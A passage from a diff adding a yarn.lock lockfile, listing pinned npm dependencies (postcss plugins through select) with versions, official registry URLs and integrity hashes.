"https://registry.yarnpkg.com/postcss-colormin/-/postcss-colormin-2.2.2.tgz#6631417d5f0e909a3d7ec26b24c8a8d1e4f96e4b" + dependencies: + colormin "^1.0.5" + postcss "^5.0.13" + postcss-value-parser "^3.2.3" + +postcss-convert-values@^2.3.4: + version "2.6.1" + resolved "https://registry.yarnpkg.com/postcss-convert-values/-/postcss-convert-values-2.6.1.tgz#bbd8593c5c1fd2e3d1c322bb925dcae8dae4d62d" + dependencies: + postcss "^5.0.11" + postcss-value-parser "^3.1.2" + +postcss-discard-comments@^2.0.4: + version "2.0.4" + resolved "https://registry.yarnpkg.com/postcss-discard-comments/-/postcss-discard-comments-2.0.4.tgz#befe89fafd5b3dace5ccce51b76b81514be00e3d" + dependencies: + postcss "^5.0.14" + +postcss-discard-duplicates@^2.0.1: + version "2.1.0" + resolved "https://registry.yarnpkg.com/postcss-discard-duplicates/-/postcss-discard-duplicates-2.1.0.tgz#b9abf27b88ac188158a5eb12abcae20263b91932" + dependencies: + postcss "^5.0.4" + +postcss-discard-empty@^2.0.1: + version "2.1.0" + resolved "https://registry.yarnpkg.com/postcss-discard-empty/-/postcss-discard-empty-2.1.0.tgz#d2b4bd9d5ced5ebd8dcade7640c7d7cd7f4f92b5" + dependencies: + postcss "^5.0.14" + +postcss-discard-overridden@^0.1.1: + version "0.1.1" + resolved "https://registry.yarnpkg.com/postcss-discard-overridden/-/postcss-discard-overridden-0.1.1.tgz#8b1eaf554f686fb288cd874c55667b0aa3668d58" + dependencies: + postcss "^5.0.16" + +postcss-discard-unused@^2.2.1: + version "2.2.3" + resolved "https://registry.yarnpkg.com/postcss-discard-unused/-/postcss-discard-unused-2.2.3.tgz#bce30b2cc591ffc634322b5fb3464b6d934f4433" + dependencies: + postcss "^5.0.14" + uniqs "^2.0.0" + +postcss-filter-plugins@^2.0.0: + version "2.0.3" + resolved "https://registry.yarnpkg.com/postcss-filter-plugins/-/postcss-filter-plugins-2.0.3.tgz#82245fdf82337041645e477114d8e593aa18b8ec" + dependencies: + postcss "^5.0.4" + +postcss-load-config@^1.2.0: + version "1.2.0" + resolved "https://registry.yarnpkg.com/postcss-load-config/-/postcss-load-config-1.2.0.tgz#539e9afc9ddc8620121ebf9d8c3673e0ce50d28a" + dependencies: + cosmiconfig "^2.1.0" + object-assign "^4.1.0" + postcss-load-options "^1.2.0" + postcss-load-plugins "^2.3.0" + +postcss-load-options@^1.2.0: + version "1.2.0" + resolved "https://registry.yarnpkg.com/postcss-load-options/-/postcss-load-options-1.2.0.tgz#b098b1559ddac2df04bc0bb375f99a5cfe2b6d8c" + dependencies: + cosmiconfig "^2.1.0" + object-assign "^4.1.0" + +postcss-load-plugins@^2.3.0: + version "2.3.0" + resolved "https://registry.yarnpkg.com/postcss-load-plugins/-/postcss-load-plugins-2.3.0.tgz#745768116599aca2f009fad426b00175049d8d92" + dependencies: + cosmiconfig "^2.1.1" + object-assign "^4.1.0" + +postcss-loader@^2.1.5: + version "2.1.5" + resolved "https://registry.yarnpkg.com/postcss-loader/-/postcss-loader-2.1.5.tgz#3c6336ee641c8f95138172533ae461a83595e788" + dependencies: + loader-utils "^1.1.0" + postcss "^6.0.0" + postcss-load-config "^1.2.0" + schema-utils "^0.4.0" + +postcss-merge-idents@^2.1.5: + version "2.1.7" + resolved "https://registry.yarnpkg.com/postcss-merge-idents/-/postcss-merge-idents-2.1.7.tgz#4c5530313c08e1d5b3bbf3d2bbc747e278eea270" + dependencies: + has "^1.0.1" + postcss "^5.0.10" + postcss-value-parser "^3.1.1" + +postcss-merge-longhand@^2.0.1: + version "2.0.2" + resolved "https://registry.yarnpkg.com/postcss-merge-longhand/-/postcss-merge-longhand-2.0.2.tgz#23d90cd127b0a77994915332739034a1a4f3d658" + dependencies: + postcss "^5.0.4" + +postcss-merge-rules@^2.0.3: + version "2.1.2" + resolved "https://registry.yarnpkg.com/postcss-merge-rules/-/postcss-merge-rules-2.1.2.tgz#d1df5dfaa7b1acc3be553f0e9e10e87c61b5f721" + dependencies: + browserslist "^1.5.2" + caniuse-api "^1.5.2" + postcss "^5.0.4" + postcss-selector-parser "^2.2.2" + vendors "^1.0.0" + +postcss-message-helpers@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/postcss-message-helpers/-/postcss-message-helpers-2.0.0.tgz#a4f2f4fab6e4fe002f0aed000478cdf52f9ba60e" + +postcss-minify-font-values@^1.0.2: + version "1.0.5" + resolved "https://registry.yarnpkg.com/postcss-minify-font-values/-/postcss-minify-font-values-1.0.5.tgz#4b58edb56641eba7c8474ab3526cafd7bbdecb69" + dependencies: + object-assign "^4.0.1" + postcss "^5.0.4" + postcss-value-parser "^3.0.2" + +postcss-minify-gradients@^1.0.1: + version "1.0.5" + resolved "https://registry.yarnpkg.com/postcss-minify-gradients/-/postcss-minify-gradients-1.0.5.tgz#5dbda11373703f83cfb4a3ea3881d8d75ff5e6e1" + dependencies: + postcss "^5.0.12" + postcss-value-parser "^3.3.0" + +postcss-minify-params@^1.0.4: + version "1.2.2" + resolved "https://registry.yarnpkg.com/postcss-minify-params/-/postcss-minify-params-1.2.2.tgz#ad2ce071373b943b3d930a3fa59a358c28d6f1f3" + dependencies: + alphanum-sort "^1.0.1" + postcss "^5.0.2" + postcss-value-parser "^3.0.2" + uniqs "^2.0.0" + +postcss-minify-selectors@^2.0.4: + version "2.1.1" + resolved "https://registry.yarnpkg.com/postcss-minify-selectors/-/postcss-minify-selectors-2.1.1.tgz#b2c6a98c0072cf91b932d1a496508114311735bf" + dependencies: + alphanum-sort "^1.0.2" + has "^1.0.1" + postcss "^5.0.14" + postcss-selector-parser "^2.0.0" + +postcss-modules-extract-imports@^1.2.0: + version "1.2.0" + resolved "https://registry.yarnpkg.com/postcss-modules-extract-imports/-/postcss-modules-extract-imports-1.2.0.tgz#66140ecece38ef06bf0d3e355d69bf59d141ea85" + dependencies: + postcss "^6.0.1" + +postcss-modules-local-by-default@^1.2.0: + version "1.2.0" + resolved "https://registry.yarnpkg.com/postcss-modules-local-by-default/-/postcss-modules-local-by-default-1.2.0.tgz#f7d80c398c5a393fa7964466bd19500a7d61c069" + dependencies: + css-selector-tokenizer "^0.7.0" + postcss "^6.0.1" + +postcss-modules-scope@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/postcss-modules-scope/-/postcss-modules-scope-1.1.0.tgz#d6ea64994c79f97b62a72b426fbe6056a194bb90" + dependencies: + css-selector-tokenizer "^0.7.0" + postcss "^6.0.1" + +postcss-modules-values@^1.3.0: + version "1.3.0" + resolved "https://registry.yarnpkg.com/postcss-modules-values/-/postcss-modules-values-1.3.0.tgz#ecffa9d7e192518389f42ad0e83f72aec456ea20" + dependencies: + icss-replace-symbols "^1.1.0" + postcss "^6.0.1" + +postcss-normalize-charset@^1.1.0: + version "1.1.1" + resolved "https://registry.yarnpkg.com/postcss-normalize-charset/-/postcss-normalize-charset-1.1.1.tgz#ef9ee71212d7fe759c78ed162f61ed62b5cb93f1" + dependencies: + postcss "^5.0.5" + +postcss-normalize-url@^3.0.7: + version "3.0.8" + resolved "https://registry.yarnpkg.com/postcss-normalize-url/-/postcss-normalize-url-3.0.8.tgz#108f74b3f2fcdaf891a2ffa3ea4592279fc78222" + dependencies: + is-absolute-url "^2.0.0" + normalize-url "^1.4.0" + postcss "^5.0.14" + postcss-value-parser "^3.2.3" + +postcss-ordered-values@^2.1.0: + version "2.2.3" + resolved "https://registry.yarnpkg.com/postcss-ordered-values/-/postcss-ordered-values-2.2.3.tgz#eec6c2a67b6c412a8db2042e77fe8da43f95c11d" + dependencies: + postcss "^5.0.4" + postcss-value-parser "^3.0.1" + +postcss-reduce-idents@^2.2.2: + version "2.4.0" + resolved "https://registry.yarnpkg.com/postcss-reduce-idents/-/postcss-reduce-idents-2.4.0.tgz#c2c6d20cc958284f6abfbe63f7609bf409059ad3" + dependencies: + postcss "^5.0.4" + postcss-value-parser "^3.0.2" + +postcss-reduce-initial@^1.0.0: + version "1.0.1" + resolved "https://registry.yarnpkg.com/postcss-reduce-initial/-/postcss-reduce-initial-1.0.1.tgz#68f80695f045d08263a879ad240df8dd64f644ea" + dependencies: + postcss "^5.0.4" + +postcss-reduce-transforms@^1.0.3: + version "1.0.4" + resolved "https://registry.yarnpkg.com/postcss-reduce-transforms/-/postcss-reduce-transforms-1.0.4.tgz#ff76f4d8212437b31c298a42d2e1444025771ae1" + dependencies: + has "^1.0.1" + postcss "^5.0.8" + postcss-value-parser "^3.0.1" + +postcss-selector-parser@^2.0.0, postcss-selector-parser@^2.2.2: + version "2.2.3" + resolved "https://registry.yarnpkg.com/postcss-selector-parser/-/postcss-selector-parser-2.2.3.tgz#f9437788606c3c9acee16ffe8d8b16297f27bb90" + dependencies: + flatten "^1.0.2" + indexes-of "^1.0.1" + uniq "^1.0.1" + +postcss-selector-parser@^3.1.1: + version "3.1.1" + resolved "https://registry.yarnpkg.com/postcss-selector-parser/-/postcss-selector-parser-3.1.1.tgz#4f875f4afb0c96573d5cf4d74011aee250a7e865" + dependencies: + dot-prop "^4.1.1" + indexes-of "^1.0.1" + uniq "^1.0.1" + +postcss-svgo@^2.1.1: + version "2.1.6" + resolved "https://registry.yarnpkg.com/postcss-svgo/-/postcss-svgo-2.1.6.tgz#b6df18aa613b666e133f08adb5219c2684ac108d" + dependencies: + is-svg "^2.0.0" + postcss "^5.0.14" + postcss-value-parser "^3.2.3" + svgo "^0.7.0" + +postcss-unique-selectors@^2.0.2: + version "2.0.2" + resolved "https://registry.yarnpkg.com/postcss-unique-selectors/-/postcss-unique-selectors-2.0.2.tgz#981d57d29ddcb33e7b1dfe1fd43b8649f933ca1d" + dependencies: + alphanum-sort "^1.0.1" + postcss "^5.0.4" + uniqs "^2.0.0" + +postcss-value-parser@^3.0.1, postcss-value-parser@^3.0.2, postcss-value-parser@^3.1.1, postcss-value-parser@^3.1.2, postcss-value-parser@^3.2.3, postcss-value-parser@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/postcss-value-parser/-/postcss-value-parser-3.3.0.tgz#87f38f9f18f774a4ab4c8a232f5c5ce8872a9d15" + +postcss-zindex@^2.0.1: + version "2.2.0" + resolved "https://registry.yarnpkg.com/postcss-zindex/-/postcss-zindex-2.2.0.tgz#d2109ddc055b91af67fc4cb3b025946639d2af22" + dependencies: + has "^1.0.1" + postcss "^5.0.4" + uniqs "^2.0.0" + +postcss@^5.0.10, postcss@^5.0.11, postcss@^5.0.12, postcss@^5.0.13, postcss@^5.0.14, postcss@^5.0.16, postcss@^5.0.2, postcss@^5.0.4, postcss@^5.0.5, postcss@^5.0.6, postcss@^5.0.8, postcss@^5.2.16: + version "5.2.18" + resolved "https://registry.yarnpkg.com/postcss/-/postcss-5.2.18.tgz#badfa1497d46244f6390f58b319830d9107853c5" + dependencies: + chalk "^1.1.3" + js-base64 "^2.1.9" + source-map "^0.5.6" + supports-color "^3.2.3" + +postcss@^6.0.0, postcss@^6.0.1, postcss@^6.0.20, postcss@^6.0.22: + version "6.0.23" + resolved "https://registry.yarnpkg.com/postcss/-/postcss-6.0.23.tgz#61c82cc328ac60e677645f979054eb98bc0e3324" + dependencies: + chalk "^2.4.1" + source-map "^0.6.1" + supports-color "^5.4.0" + +prepend-http@^1.0.0, prepend-http@^1.0.1: + version "1.0.4" + resolved "https://registry.yarnpkg.com/prepend-http/-/prepend-http-1.0.4.tgz#d4f4562b0ce3696e41ac52d0e002e57a635dc6dc" + +preserve@^0.2.0: + version "0.2.0" + resolved "https://registry.yarnpkg.com/preserve/-/preserve-0.2.0.tgz#815ed1f6ebc65926f865b310c0713bcb3315ce4b" + +prettier@^1.13.0: + version "1.13.5" + resolved "https://registry.yarnpkg.com/prettier/-/prettier-1.13.5.tgz#7ae2076998c8edce79d63834e9b7b09fead6bfd0" + +pretty-bytes@^4.0.2: + version "4.0.2" + resolved "https://registry.yarnpkg.com/pretty-bytes/-/pretty-bytes-4.0.2.tgz#b2bf82e7350d65c6c33aa95aaa5a4f6327f61cd9" + +pretty-error@^2.0.2: + version "2.1.1" + resolved "https://registry.yarnpkg.com/pretty-error/-/pretty-error-2.1.1.tgz#5f4f87c8f91e5ae3f3ba87ab4cf5e03b1a17f1a3" + dependencies: + renderkid "^2.0.1" + utila "~0.4" + +pretty-time@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/pretty-time/-/pretty-time-1.0.0.tgz#544784adecaa2cd7d045ff8a8f1d4791c8e06e23" + dependencies: + is-number "^5.0.0" + nanoseconds "^1.0.0" + +prismjs@^1.13.0: + version "1.15.0" + resolved "https://registry.yarnpkg.com/prismjs/-/prismjs-1.15.0.tgz#8801d332e472091ba8def94976c8877ad60398d9" + optionalDependencies: + clipboard "^2.0.0" + +private@^0.1.6: + version "0.1.8" + resolved "https://registry.yarnpkg.com/private/-/private-0.1.8.tgz#2381edb3689f7a53d653190060fcf822d2f368ff" + +process-nextick-args@~2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/process-nextick-args/-/process-nextick-args-2.0.0.tgz#a37d732f4271b4ab1ad070d35508e8290788ffaa" + +process@^0.11.10: + version "0.11.10" + resolved "https://registry.yarnpkg.com/process/-/process-0.11.10.tgz#7332300e840161bda3e69a1d1d91a7d4bc16f182" + +process@~0.5.1: + version "0.5.2" + resolved "https://registry.yarnpkg.com/process/-/process-0.5.2.tgz#1638d8a8e34c2f440a91db95ab9aeb677fc185cf" + +promise-inflight@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/promise-inflight/-/promise-inflight-1.0.1.tgz#98472870bf228132fcbdd868129bad12c3c029e3" + +prr@~1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/prr/-/prr-1.0.1.tgz#d3fc114ba06995a45ec6893f484ceb1d78f5f476" + +pseudomap@^1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/pseudomap/-/pseudomap-1.0.2.tgz#f052a28da70e618917ef0a8ac34c1ae5a68286b3" + +public-encrypt@^4.0.0: + version "4.0.2" + resolved "https://registry.yarnpkg.com/public-encrypt/-/public-encrypt-4.0.2.tgz#46eb9107206bf73489f8b85b69d91334c6610994" + dependencies: + bn.js "^4.1.0" + browserify-rsa "^4.0.0" + create-hash "^1.1.0" + parse-asn1 "^5.0.0" + randombytes "^2.0.1" + +pump@^2.0.0, pump@^2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/pump/-/pump-2.0.1.tgz#12399add6e4cf7526d973cbc8b5ce2e2908b3909" + dependencies: + end-of-stream "^1.1.0" + once "^1.3.1" + +pumpify@^1.3.3: + version "1.5.1" + resolved "https://registry.yarnpkg.com/pumpify/-/pumpify-1.5.1.tgz#36513be246ab27570b1a374a5ce278bfd74370ce" + dependencies: + duplexify "^3.6.0" + inherits "^2.0.3" + pump "^2.0.0" + +punycode@1.3.2: + version "1.3.2" + resolved "https://registry.yarnpkg.com/punycode/-/punycode-1.3.2.tgz#9653a036fb7c1ee42342f2325cceefea3926c48d" + +punycode@2.x.x, punycode@^2.1.0: + version "2.1.1" + resolved "https://registry.yarnpkg.com/punycode/-/punycode-2.1.1.tgz#b58b010ac40c22c5657616c8d2c2c02c7bf479ec" + +punycode@^1.2.4: + version "1.4.1" + resolved "https://registry.yarnpkg.com/punycode/-/punycode-1.4.1.tgz#c0d5a63b2718800ad8e1eb0fa5269c84dd41845e" + +q@^1.1.2: + version "1.5.1" + resolved "https://registry.yarnpkg.com/q/-/q-1.5.1.tgz#7e32f75b41381291d04611f1bf14109ac00651d7" + +query-string@^4.1.0: + version "4.3.4" + resolved "https://registry.yarnpkg.com/query-string/-/query-string-4.3.4.tgz#bbb693b9ca915c232515b228b1a02b609043dbeb" + dependencies: + object-assign "^4.1.0" + strict-uri-encode "^1.0.0" + +querystring-es3@^0.2.0, querystring-es3@^0.2.1: + version "0.2.1" + resolved "https://registry.yarnpkg.com/querystring-es3/-/querystring-es3-0.2.1.tgz#9ec61f79049875707d69414596fd907a4d711e73" + +querystring@0.2.0: + version "0.2.0" + resolved "https://registry.yarnpkg.com/querystring/-/querystring-0.2.0.tgz#b209849203bb25df820da756e747005878521620" + +quick-lru@^1.0.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/quick-lru/-/quick-lru-1.1.0.tgz#4360b17c61136ad38078397ff11416e186dcfbb8" + +randomatic@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/randomatic/-/randomatic-3.0.0.tgz#d35490030eb4f7578de292ce6dfb04a91a128923" + dependencies: + is-number "^4.0.0" + kind-of "^6.0.0" + math-random "^1.0.1" + +randombytes@^2.0.0, randombytes@^2.0.1, randombytes@^2.0.5: + version "2.0.6" + resolved "https://registry.yarnpkg.com/randombytes/-/randombytes-2.0.6.tgz#d302c522948588848a8d300c932b44c24231da80" + dependencies: + safe-buffer "^5.1.0" + +randomfill@^1.0.3: + version "1.0.4" + resolved "https://registry.yarnpkg.com/randomfill/-/randomfill-1.0.4.tgz#c92196fc86ab42be983f1bf31778224931d61458" + dependencies: + randombytes "^2.0.5" + safe-buffer "^5.1.0" + +range-parser@^1.0.3: + version "1.2.0" + resolved "https://registry.yarnpkg.com/range-parser/-/range-parser-1.2.0.tgz#f49be6b487894ddc40dcc94a322f611092e00d5e" + +rc@^1.0.1, rc@^1.1.6, rc@^1.1.7: + version "1.2.8" + resolved "https://registry.yarnpkg.com/rc/-/rc-1.2.8.tgz#cd924bf5200a075b83c188cd6b9e211b7fc0d3ed" + dependencies: + deep-extend "^0.6.0" + ini "~1.3.0" + minimist "^1.2.0" + strip-json-comments "~2.0.1" + +read-pkg-up@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/read-pkg-up/-/read-pkg-up-3.0.0.tgz#3ed496685dba0f8fe118d0691dc51f4a1ff96f07" + dependencies: + find-up "^2.0.0" + read-pkg "^3.0.0" + +read-pkg@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/read-pkg/-/read-pkg-3.0.0.tgz#9cbc686978fee65d16c00e2b19c237fcf6e38389" + dependencies: + load-json-file "^4.0.0" + normalize-package-data "^2.3.2" + path-type "^3.0.0" + +"readable-stream@1 || 2", readable-stream@^2.0.0, readable-stream@^2.0.1, readable-stream@^2.0.2, readable-stream@^2.0.4, readable-stream@^2.0.6, readable-stream@^2.1.5, readable-stream@^2.2.2, readable-stream@^2.3.3, readable-stream@^2.3.6: + version "2.3.6" + resolved "https://registry.yarnpkg.com/readable-stream/-/readable-stream-2.3.6.tgz#b11c27d88b8ff1fbe070643cf94b0c79ae1b0aaf" + dependencies: + core-util-is "~1.0.0" + inherits "~2.0.3" + isarray "~1.0.0" + process-nextick-args "~2.0.0" + safe-buffer "~5.1.1" + string_decoder "~1.1.1" + util-deprecate "~1.0.1" + +readable-stream@1.0: + version "1.0.34" + resolved "https://registry.yarnpkg.com/readable-stream/-/readable-stream-1.0.34.tgz#125820e34bc842d2f2aaafafe4c2916ee32c157c" + dependencies: + core-util-is "~1.0.0" + inherits "~2.0.1" + isarray "0.0.1" + string_decoder "~0.10.x" + +readdirp@^2.0.0: + version "2.1.0" + resolved "https://registry.yarnpkg.com/readdirp/-/readdirp-2.1.0.tgz#4ed0ad060df3073300c48440373f72d1cc642d78" + dependencies: + graceful-fs "^4.1.2" + minimatch "^3.0.2" + readable-stream "^2.0.2" + set-immediate-shim "^1.0.1" + +redent@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/redent/-/redent-2.0.0.tgz#c1b2007b42d57eb1389079b3c8333639d5e1ccaa" + dependencies: + indent-string "^3.0.0" + strip-indent "^2.0.0" + +reduce-css-calc@^1.2.6: + version "1.3.0" + resolved "https://registry.yarnpkg.com/reduce-css-calc/-/reduce-css-calc-1.3.0.tgz#747c914e049614a4c9cfbba629871ad1d2927716" + dependencies: + balanced-match "^0.4.2" + math-expression-evaluator "^1.2.14" + reduce-function-call "^1.0.1" + +reduce-function-call@^1.0.1: + version "1.0.2" + resolved "https://registry.yarnpkg.com/reduce-function-call/-/reduce-function-call-1.0.2.tgz#5a200bf92e0e37751752fe45b0ab330fd4b6be99" + dependencies: + balanced-match "^0.4.2" + +reduce@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/reduce/-/reduce-1.0.1.tgz#14fa2e5ff1fc560703a020cbb5fbaab691565804" + dependencies: + object-keys "~1.0.0" + +regenerate-unicode-properties@^7.0.0: + version "7.0.0" + resolved "https://registry.yarnpkg.com/regenerate-unicode-properties/-/regenerate-unicode-properties-7.0.0.tgz#107405afcc4a190ec5ed450ecaa00ed0cafa7a4c" + dependencies: + regenerate "^1.4.0" + +regenerate@^1.2.1, regenerate@^1.4.0: + version "1.4.0" + resolved "https://registry.yarnpkg.com/regenerate/-/regenerate-1.4.0.tgz#4a856ec4b56e4077c557589cae85e7a4c8869a11" + +regenerator-runtime@^0.11.0, regenerator-runtime@^0.11.1: + version "0.11.1" + resolved "https://registry.yarnpkg.com/regenerator-runtime/-/regenerator-runtime-0.11.1.tgz#be05ad7f9bf7d22e056f9726cee5017fbf19e2e9" + +regenerator-transform@^0.12.3: + version "0.12.4" + resolved "https://registry.yarnpkg.com/regenerator-transform/-/regenerator-transform-0.12.4.tgz#aa9b6c59f4b97be080e972506c560b3bccbfcff0" + dependencies: + private "^0.1.6" + +regex-cache@^0.4.2: + version "0.4.4" + resolved "https://registry.yarnpkg.com/regex-cache/-/regex-cache-0.4.4.tgz#75bdc58a2a1496cec48a12835bc54c8d562336dd" + dependencies: + is-equal-shallow "^0.1.3" + +regex-not@^1.0.0, regex-not@^1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/regex-not/-/regex-not-1.0.2.tgz#1f4ece27e00b0b65e0247a6810e6a85d83a5752c" + dependencies: + extend-shallow "^3.0.2" + safe-regex "^1.1.0" + +regexpu-core@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/regexpu-core/-/regexpu-core-1.0.0.tgz#86a763f58ee4d7c2f6b102e4764050de7ed90c6b" + dependencies: + regenerate "^1.2.1" + regjsgen "^0.2.0" + regjsparser "^0.1.4" + +regexpu-core@^4.1.3, regexpu-core@^4.1.4: + version "4.2.0" + resolved "https://registry.yarnpkg.com/regexpu-core/-/regexpu-core-4.2.0.tgz#a3744fa03806cffe146dea4421a3e73bdcc47b1d" + dependencies: + regenerate "^1.4.0" + regenerate-unicode-properties "^7.0.0" + regjsgen "^0.4.0" + regjsparser "^0.3.0" + unicode-match-property-ecmascript "^1.0.4" + unicode-match-property-value-ecmascript "^1.0.2" + +register-service-worker@^1.2.0: + version "1.4.1" + resolved "https://registry.yarnpkg.com/register-service-worker/-/register-service-worker-1.4.1.tgz#4b4c9b4200fc697942c6ae7d611349587b992b2f" + +registry-auth-token@^3.0.1: + version "3.3.2" + resolved "https://registry.yarnpkg.com/registry-auth-token/-/registry-auth-token-3.3.2.tgz#851fd49038eecb586911115af845260eec983f20" + dependencies: + rc "^1.1.6" + safe-buffer "^5.0.1" + +registry-url@^3.0.3: + version "3.1.0" + resolved "https://registry.yarnpkg.com/registry-url/-/registry-url-3.1.0.tgz#3d4ef870f73dde1d77f0cf9a381432444e174942" + dependencies: + rc "^1.0.1" + +regjsgen@^0.2.0: + version "0.2.0" + resolved "https://registry.yarnpkg.com/regjsgen/-/regjsgen-0.2.0.tgz#6c016adeac554f75823fe37ac05b92d5a4edb1f7" + +regjsgen@^0.4.0: + version "0.4.0" + resolved "https://registry.yarnpkg.com/regjsgen/-/regjsgen-0.4.0.tgz#c1eb4c89a209263f8717c782591523913ede2561" + +regjsparser@^0.1.4: + version "0.1.5" + resolved "https://registry.yarnpkg.com/regjsparser/-/regjsparser-0.1.5.tgz#7ee8f84dc6fa792d3fd0ae228d24bd949ead205c" + dependencies: + jsesc "~0.5.0" + +regjsparser@^0.3.0: + version "0.3.0" + resolved "https://registry.yarnpkg.com/regjsparser/-/regjsparser-0.3.0.tgz#3c326da7fcfd69fa0d332575a41c8c0cdf588c96" + dependencies: + jsesc "~0.5.0" + +relateurl@0.2.x: + version "0.2.7" + resolved "https://registry.yarnpkg.com/relateurl/-/relateurl-0.2.7.tgz#54dbf377e51440aca90a4cd274600d3ff2d888a9" + +remove-array-items@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/remove-array-items/-/remove-array-items-1.0.0.tgz#07bf42cb332f4cf6e85ead83b5e4e896d2326b21" + +remove-trailing-separator@^1.0.1: + version "1.1.0" + resolved "https://registry.yarnpkg.com/remove-trailing-separator/-/remove-trailing-separator-1.1.0.tgz#c24bce2a283adad5bc3f58e0d48249b92379d8ef" + +renderkid@^2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/renderkid/-/renderkid-2.0.1.tgz#898cabfc8bede4b7b91135a3ffd323e58c0db319" + dependencies: + css-select "^1.1.0" + dom-converter "~0.1" + htmlparser2 "~3.3.0" + strip-ansi "^3.0.0" + utila "~0.3" + +repeat-element@^1.1.2: + version "1.1.2" + resolved "https://registry.yarnpkg.com/repeat-element/-/repeat-element-1.1.2.tgz#ef089a178d1483baae4d93eb98b4f9e4e11d990a" + +repeat-string@^1.5.2, repeat-string@^1.6.1: + version "1.6.1" + resolved "https://registry.yarnpkg.com/repeat-string/-/repeat-string-1.6.1.tgz#8dcae470e1c88abc2d600fff4a776286da75e637" + +require-from-string@^1.1.0: + version "1.2.1" + resolved "https://registry.yarnpkg.com/require-from-string/-/require-from-string-1.2.1.tgz#529c9ccef27380adfec9a2f965b649bbee636418" + +resolve-cwd@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/resolve-cwd/-/resolve-cwd-2.0.0.tgz#00a9f7387556e27038eae232caa372a6a59b665a" + dependencies: + resolve-from "^3.0.0" + +resolve-from@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/resolve-from/-/resolve-from-3.0.0.tgz#b22c7af7d9d6881bc8b6e653335eebcb0a188748" + +resolve-path@^1.3.3, resolve-path@^1.4.0: + version "1.4.0" + resolved "https://registry.yarnpkg.com/resolve-path/-/resolve-path-1.4.0.tgz#c4bda9f5efb2fce65247873ab36bb4d834fe16f7" + dependencies: + http-errors "~1.6.2" + path-is-absolute "1.0.1" + +resolve-url@^0.2.1: + version "0.2.1" + resolved "https://registry.yarnpkg.com/resolve-url/-/resolve-url-0.2.1.tgz#2c637fe77c893afd2a663fe21aa9080068e2052a" + +resolve@^1.2.0, resolve@^1.3.2, resolve@^1.6.0: + version "1.8.1" + resolved "https://registry.yarnpkg.com/resolve/-/resolve-1.8.1.tgz#82f1ec19a423ac1fbd080b0bab06ba36e84a7a26" + dependencies: + path-parse "^1.0.5" + +restore-cursor@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/restore-cursor/-/restore-cursor-2.0.0.tgz#9f7ee287f82fd326d4fd162923d62129eee0dfaf" + dependencies: + onetime "^2.0.0" + signal-exit "^3.0.2" + +ret@~0.1.10: + version "0.1.15" + resolved "https://registry.yarnpkg.com/ret/-/ret-0.1.15.tgz#b8a4825d5bdb1fc3f6f53c2bc33f81388681c7bc" + +rimraf@^2.5.4, rimraf@^2.6.1, rimraf@^2.6.2: + version "2.6.2" + resolved "https://registry.yarnpkg.com/rimraf/-/rimraf-2.6.2.tgz#2ed8150d24a16ea8651e6d6ef0f47c4158ce7a36" + dependencies: + glob "^7.0.5" + +ripemd160@^2.0.0, ripemd160@^2.0.1: + version "2.0.2" + resolved "https://registry.yarnpkg.com/ripemd160/-/ripemd160-2.0.2.tgz#a1c1a6f624751577ba5d07914cbc92850585890c" + dependencies: + hash-base "^3.0.0" + inherits "^2.0.1" + +run-queue@^1.0.0, run-queue@^1.0.3: + version "1.0.3" + resolved "https://registry.yarnpkg.com/run-queue/-/run-queue-1.0.3.tgz#e848396f057d223f24386924618e25694161ec47" + dependencies: + aproba "^1.1.1" + +safe-buffer@^5.0.1, safe-buffer@^5.1.0, safe-buffer@^5.1.1, safe-buffer@^5.1.2, safe-buffer@~5.1.0, safe-buffer@~5.1.1: + version "5.1.2" + resolved "https://registry.yarnpkg.com/safe-buffer/-/safe-buffer-5.1.2.tgz#991ec69d296e0313747d59bdfd2b745c35f8828d" + +safe-regex@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/safe-regex/-/safe-regex-1.1.0.tgz#40a3669f3b077d1e943d44629e157dd48023bf2e" + dependencies: + ret "~0.1.10" + +"safer-buffer@>= 2.1.2 < 3": + version "2.1.2" + resolved "https://registry.yarnpkg.com/safer-buffer/-/safer-buffer-2.1.2.tgz#44fa161b0187b9549dd84bb91802f9bd8385cd6a" + +sax@0.5.x: + version "0.5.8" + resolved "https://registry.yarnpkg.com/sax/-/sax-0.5.8.tgz#d472db228eb331c2506b0e8c15524adb939d12c1" + +sax@^1.2.4, sax@~1.2.1: + version "1.2.4" + resolved "https://registry.yarnpkg.com/sax/-/sax-1.2.4.tgz#2816234e2378bddc4e5354fab5caa895df7100d9" + +schema-utils@^0.4.0, schema-utils@^0.4.2, schema-utils@^0.4.3, schema-utils@^0.4.4, schema-utils@^0.4.5: + version "0.4.5" + resolved "https://registry.yarnpkg.com/schema-utils/-/schema-utils-0.4.5.tgz#21836f0608aac17b78f9e3e24daff14a5ca13a3e" + dependencies: + ajv "^6.1.0" + ajv-keywords "^3.1.0" + +section-matter@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/section-matter/-/section-matter-1.0.0.tgz#e9041953506780ec01d59f292a19c7b850b84167" + dependencies: + extend-shallow "^2.0.1" + kind-of "^6.0.0" + +select@^1.1.2: + version "1.1.2" + resolved 